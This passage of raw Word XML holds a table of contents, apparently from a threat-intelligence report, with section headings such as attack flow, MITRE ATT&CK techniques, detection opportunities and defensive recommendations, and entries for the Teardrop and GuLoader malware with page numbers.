              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="70FB58AC" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="45" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="45" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38BCF629" w14:textId="74C9F5EB" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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43C6799" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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C5F3737" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00C94863">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Attack Objectives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BD622A1" w14:textId="4630F7FB" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="0280493D" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="45" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="45" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7585A4AF" w14:textId="609E864C" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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230BC47D" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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57DAD14" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00C94863">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Targeted Sectors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1659E8D" w14:textId="05BA4347" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>06</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="4DC77101" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="45" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="45" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E865D9D" w14:textId="7B205BB7" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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53C20935" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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5E8176F" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00C94863">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Attack Flow</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3D7EDB7" w14:textId="6A2B737C" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>07</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="113A639A" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="45" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="45" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7746FFF0" w14:textId="64ADBBA5" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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79D58C73" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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07A1822" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00C94863">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK Techniques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6FC89AC" w14:textId="60A3CC96" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>08</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="230EB400" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="45" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="45" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="080BD5CD" w14:textId="42AB2EA4" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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915DE8E" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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707D98E" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00C94863">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Real-world Incidents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33212F9" w14:textId="00CB0FDF" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="546FA3BD" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="45" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="45" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="061C19CD" w14:textId="1E2DED88" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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7F1690FB" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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FC4E047" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00C94863">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Detection Opportunities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EDCB744" w14:textId="0DA80C30" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="7721FDFB" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="45" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="45" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59E9630C" w14:textId="47D94818" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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6989B7F2" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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362B107" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00C94863">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Defensive Recommendations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C2E4BE2" w14:textId="0AFB2575" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="25C78937" w14:textId="77777777" w:rsidTr="00B32006">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="45" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="45" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E198110" w14:textId="6B619A39" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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3793ED1" w14:textId="3B4C2F3A" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Software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D6BC971" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="00970745" w:rsidRDefault="00175DEC" w:rsidP="00C94863">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00970745">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:b/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="16"/>
                  <w:u w:val="none"/>
                </w:rPr>
                <w:t>S0560</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00970745">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> - Teardrop</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B1BD501" w14:textId="7B631AFA" w:rsidR="00175DEC" w:rsidRPr="00970745" w:rsidRDefault="00B701FC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00970745">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="139B898F" w14:textId="77777777" w:rsidTr="00B32006">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="45" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="45" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72E7D493" w14:textId="697E2F28" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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2D30430" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="1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5477C9" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00C94863">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId9" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:b/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="16"/>
                </w:rPr>
                <w:t>S0561</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> - GuLoader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7842566" w14:textId="354BDC2A" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00B701FC" w:rsidP="00A127F4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="688BBAA9" w14:textId="77777777" w:rsidTr="00B32006">
        <w:trPr>
